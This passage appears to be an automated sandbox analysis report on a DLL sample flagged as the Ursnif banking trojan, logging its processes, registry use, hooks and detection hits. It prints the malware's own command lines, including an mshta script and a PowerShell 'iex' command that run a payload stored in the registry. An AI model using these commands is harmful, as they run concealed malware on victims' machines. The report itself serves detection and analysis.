Source: C:\Windows\System32\control.exe Code function: 38_2_00C9AC2C 38_2_00C9AC2C
Source: C:\Windows\System32\control.exe Code function: 38_2_00C94424 38_2_00C94424
Source: C:\Windows\System32\control.exe Code function: 38_2_00CA15DC 38_2_00CA15DC
Source: C:\Windows\System32\control.exe Code function: 38_2_00C915AC 38_2_00C915AC
Source: C:\Windows\System32\control.exe Code function: 38_2_00CA1178 38_2_00CA1178
Source: C:\Windows\System32\control.exe Code function: 38_2_00C9812C 38_2_00C9812C
Source: C:\Windows\System32\control.exe Code function: 38_2_00CA7120 38_2_00CA7120
Source: C:\Windows\System32\control.exe Code function: 38_2_00C92AC0 38_2_00C92AC0
Source: C:\Windows\System32\control.exe Code function: 38_2_00CABAEC 38_2_00CABAEC
Source: C:\Windows\System32\control.exe Code function: 38_2_00CAEAE0 38_2_00CAEAE0
Source: C:\Windows\System32\control.exe Code function: 38_2_00CB2210 38_2_00CB2210
Source: C:\Windows\System32\control.exe Code function: 38_2_00CB4638 38_2_00CB4638
Source: C:\Windows\System32\control.exe Code function: 38_2_00C947CC 38_2_00C947CC
Source: C:\Windows\System32\control.exe Code function: 38_2_00C937D8 38_2_00C937D8
Source: C:\Windows\System32\control.exe Code function: 38_2_00CAF78C 38_2_00CAF78C
Source: C:\Windows\System32\control.exe Code function: 38_2_00C99390 38_2_00C99390
Source: C:\Windows\System32\control.exe Code function: 38_2_00CA2BB8 38_2_00CA2BB8
Source: C:\Windows\System32\control.exe Code function: 38_2_00CAA754 38_2_00CAA754
Source: C:\Windows\System32\control.exe Code function: 38_2_00CAE764 38_2_00CAE764
Source: C:\Windows\System32\control.exe Code function: 38_2_00C9BB78 38_2_00C9BB78
Source: C:\Windows\System32\control.exe Code function: 38_2_00CB2F7C 38_2_00CB2F7C
Source: C:\Windows\System32\control.exe Code function: 38_2_00C9DB0C 38_2_00C9DB0C
Source: C:\Windows\System32\control.exe Code function: 38_2_00CA2310 38_2_00CA2310
Source: C:\Windows\System32\control.exe Code function: 38_2_00CAC320 38_2_00CAC320
Source: C:\Windows\System32\control.exe Code function: 38_2_00CABF38 38_2_00CABF38
PE file does not import any functions
Source: kboh4jur.dll.34.dr Static PE information: No import functions for PE file found
Source: xjciegge.dll.36.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: mal.dll Binary or memory string: OriginalFilenameLiquid.dllH vs mal.dll
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Uses 32bit PE files
Source: mal.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@32/166@16/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049FA4FF CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 1_2_049FA4FF
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1384:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{88D2CA97-47D4-FA04-113C-6BCED530CFE2}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{B072D678-4FE6-621F-59E4-F3B69D58D74A}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{407745C0-9F81-72E2-2974-43C66DE8275A}
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF55EEAABB3F13D2AA.TMP Jump to behavior
Source: mal.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: mal.dll Virustotal: Detection: 8%
Source: regsvr32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\mal.dll'
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\mal.dll
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17426 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:82958 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17442 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:82974 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3736.tmp' 'c:\Users\user\AppData\Local\Temp\kboh4jur\CSC3D4FC79349B84E14A11DB5BE381E50D0.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES48CA.tmp' 'c:\Users\user\AppData\Local\Temp\xjciegge\CSCE781F4B6FB444C94B757D31BBD45D613.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\mal.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17426 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:82958 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17442 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:82974 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3736.tmp' 'c:\Users\user\AppData\Local\Temp\kboh4jur\CSC3D4FC79349B84E14A11DB5BE381E50D0.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES48CA.tmp' 'c:\Users\user\AppData\Local\Temp\xjciegge\CSCE781F4B6FB444C94B757D31BBD45D613.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: mal.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: mal.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: mal.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: mal.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: mal.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: mal.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: mal.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: mal.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.pdbXP source: powershell.exe, 0000001F.00000002.588416083.000002BCB044F000.00000004.00000001.sdmp
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000022.00000002.524161454.000001F970260000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.534868528.0000022F9CC10000.00000002.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.pdb source: powershell.exe, 0000001F.00000002.588110987.000002BCB0417000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.pdbXP source: powershell.exe, 0000001F.00000002.588110987.000002BCB0417000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.532411050.0000000005AF0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.532411050.0000000005AF0000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000026.00000002.562617431.0000018E5BDEC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000026.00000002.562617431.0000018E5BDEC000.00000004.00000040.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.pdb source: powershell.exe, 0000001F.00000002.587767653.000002BCB03D7000.00000004.00000001.sdmp
Source: Binary string: c:\Movenear\AgoSection\placeRace\Liquid.pdb source: mal.dll
Source: mal.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: mal.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: mal.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: mal.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: mal.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A010B4 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 1_2_04A010B4
Registers a DLL
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\mal.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A11CB0 push ecx; ret 1_2_04A11CB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A02746 push ecx; mov dword ptr [esp], 00000002h 1_2_04A02747
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A121A3 push ecx; ret 1_2_04A121B3
Source: initial sample Static PE information: section name: .text entropy: 6.91369590401

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.474076066.0000000004C1C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421520265.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421722913.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421588649.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.559791102.0000000000CC6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421746535.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421559513.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421467795.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421622681.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421656779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7068, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6348, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6660, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
